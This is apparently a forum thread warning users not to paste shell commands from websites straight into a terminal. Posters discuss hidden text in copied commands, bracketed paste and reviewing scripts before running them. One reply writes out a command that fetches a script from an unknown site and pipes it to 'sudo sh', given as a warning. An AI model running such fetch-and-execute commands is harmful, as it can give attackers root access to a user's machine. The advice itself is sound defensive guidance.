Never directly paste commands into CLI from websites

As a a recent blog post showed in a simple manner: Let me remember you to either paste any CLI commands you copy from a website into an editor or install some sort of checker. Otherwise you might get your unix system easily infected with malware or other shenanigans.

I myself am now using bracketed paste in my ZSH, which I highly recommend.
Reddit users also suggest other solutions.

Keep your systems safe, boys and girls! :)

16 Likes

yep.

also any system that auto runs commands as soon as you paste them is not a system i want to use.
auto run on paste is a POS feature which my mac has.

1 Like

stupid question... why? I normaly type them and use autocomplete if possible so I never copy and paste at least i cant remember the last time I did

1 Like

Thanks man! nice share.

Depends of course a bit on what kind of distro you use aswell
I mean Ubuntu based distributions that sometimes needs ppa´s to install certain software.
You should indeed allways double check the source of the ppa link firstly.

This of course aside from commands, which you should allways check before use.

A simple right click and inspecting elements on a webpage can save you a lot of head ache.

2 Likes

You can direct copy if you simple use shift and right arrow from the beginning, the code is hidden after the space so its like this "ls (HIDDEDN TEXT)-lat" If you simply put cursor at the beginning next to LS then shift over you can see that there is more then what is displayed.

Well, sometimes it's just easier to copy something by marking it and pasting it with middle mouse button, for example when downloading a file via http-link. But with default terminal settings, you can engineer a text to contain hidden commands (if you haven't, try the ls -lat command from the website), so I prefer installing an addon than typing 50 character http links ;).

That's one way. I prefer using multibracket paste, so I can review what I'm pasting ;).

I prefer to paste into a text editor then sanity check before running. Malware is less of a risk than "stupidware". Make sure commands aren't going to cause irreparable damage before running!

These are the magical words.
If the user is 'a typical user' It's no trick to, for example, have them click on the wrong thing once and suddenly their keystrokes and all files are transferred over the network, without escalating priviledges, without the user knowing.
Imagine if that happened in a corporation.

2 Likes

Particularly if the command includes something along of the lines of wget -O - http://[someunknownwebsite]/install.sh | sudo sh. Before you know it you've created a reverse tunnel back door, added a user, given is full sudo and notified someone at the other end there's a server available for them to play with. You could actually have no visual feed back of what's gone and the last task could well be to write some innocent looking code to the "install.sh".
1. Download code using a non privileged user and preferably not to the server it's going to be run from.
2. View the code and manually download any other packages it's downloading
3. Read it a couple of times through to be certain it's not doing anything untoward
4. Edit the code to ensure that paths/users/IP addys etc are relevant and correct
5. DON'T RUN IT ON A PRODUCTION SERVER WITHOUT HAVING RAN IT SOMEWHERE ELSE AND PEER REVIEWED

thanks for the tip op